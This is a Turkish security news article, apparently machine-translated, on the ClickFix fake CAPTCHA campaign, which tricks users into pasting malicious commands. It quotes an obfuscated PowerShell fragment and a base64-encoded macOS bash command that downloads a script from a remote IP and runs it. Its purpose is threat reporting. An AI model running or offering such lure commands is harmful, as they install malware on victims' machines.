Sahte Captcha doğrulama sayfalarını, kullanıcıları kötü amaçlı PowerShell komutlarını yürütmeye ve tarayıcı tabanlı saldırı metodolojilerinde önemli bir evrimi işaretlemek için silahlandıran gelişmiş yeni bir kötü amaçlı yazılım kampanyası ortaya çıktı.
“ClickFix” olarak adlandırılan kampanya, siber güvenlik uzmanlarının 2024 boyunca tehdit manzarasına hakim olan geleneksel sahte tarayıcı güncelleme dolandırıcılığının yeni nesil mutasyonunu söylediğini temsil ediyor.
Saldırı, kurbanların tanıdık Google Recaptcha veya Cloudflare markasıyla tamamlanan meşru bir Captcha doğrulama zorluğu gibi görünen şeylerle karşılaştıklarında başlar.
Bununla birlikte, geleneksel bir bulmacayı çözmek yerine, kullanıcılara nihayetinde gizli kötü amaçlı kodun yürütülmesine neden olan bir dizi klavye kısayolu ile insanlıklarını doğrulamaları talimatı verilir.
.webp){kind=spacer}
Aldatıcı arayüz, bir PowerShell komutunu kurbanın panosuna kopyalar, ardından Windows+R, Ctrl+V tuşlarına bastığınız gibi görünüşte zararsız adımlarla rehberlik eder ve “doğrulamayı tamamlamaya” girer.
Bu kampanyayı özellikle tehlikeli kılan şey, basit kötü niyetle pencereleri, macOS ve Linux sistemlerini hedefleyen sofistike, çok platformlu işlemlere kadar hızlı evrimidir.
.webp)
Saldırı, şüpheli dosya indirme ihtiyacını ortadan kaldırarak ve meşru görünmek için güvenilir altyapı kullanarak daha önceki sahte tarayıcı güncelleme planlarını başarıyla yerinden etti.
Guardio araştırmacıları, bu kampanyayı tarayıcı tabanlı tehditlerin sürekli izlenmesinin bir parçası olarak belirlediler ve saldırganların yaklaşımlarını üç kritik boyutta nasıl geliştirdiklerini belirtti: yayılma yöntemleri, anlatı sofistike ve kaçınma teknikleri.
Araştırma ekibi, kampanyanın şüpheli web sitelerindeki temel açılır reklamlardan, Booking.com gibi meşru hizmetleri taklit eden yüksek hedefli kimlik avı e-postalarına geçişini gözlemledi.
Teknik evrim ve platformlar arası genişleme
Captchageddon’un en ilgili yönü, teknik sofistike ve platformlar arası yetenekleridir.
.webp)
Windows odaklı ilk saldırılar, imza tabanlı algılama sistemlerinden kaçınmak için tasarlanmış yoğun bir şekilde gizlenmiş PowerShell komutları kullanıldı. Örneğin, saldırganlar basit komutları şu gibi karmaşık varyasyonlara dönüştürdü:-
POWERSHELL -N"oP"r"OF"I /w h /"COM"ma "$s"r"t15 = 'c"m"b"k"z8b"ui0000"08k"2"2bcm3"b"[3k.info]Beobfuscated olduğunda, bu, saldırgan kontrolündeki altyapıdan uzaktan kodu getiren ve yürüten basit bir yük dağıtım mekanizması ortaya çıkar.
Kampanyanın macOS’a genişlemesi, çoğu MAC kullanıcısının komut satırı arabirimlerine sahip olduğu alışılmadıktan yararlandığı için özellikle endişe verici bir gelişmeyi temsil ediyor.
MacOS varyantı, kurbanlara spot ışığı arama yoluyla terminal açmalarını ve Base64 kodlu bash komutlarını yürütmelerini söyler. Tipik bir macOS yükü şu şekilde görünür:
echo "Y3VybCAtcyBodHRwOi8vNDUuMTM1LjIzMi4zMy9kL3JvYmVydG84NTg2NiB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bashKod çözüldüğünde, bu komut, tehlike yazılımların uzlaşmış sunuculardan sessiz bir şekilde indirilmesi ve yürütülmesi gerçekleştirir.
.webp)
Saldırganlar ayrıca, kötü amaçlı captcha akışlarını barındırmak için Google Scripts platformundan yararlanmaya başladı ve meşru doğrulama süreçlerinin görünümünü korurken Google’ın güvenilir itibarını atlayarak Güvenlik Filtreleri’ni atladı.
.webp)
Kampanyanın altyapı analizi, kümeleme analizi, tutarlı komut modelleri ve alan yapıları kullanarak farklı saldırgan gruplarını tanımlayan yüksek organize operasyonları ortaya koymaktadır.
Dikkate değer bir küme, manuel kampanya geliştirme yerine otomatik araç seti kullanımı önererek.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın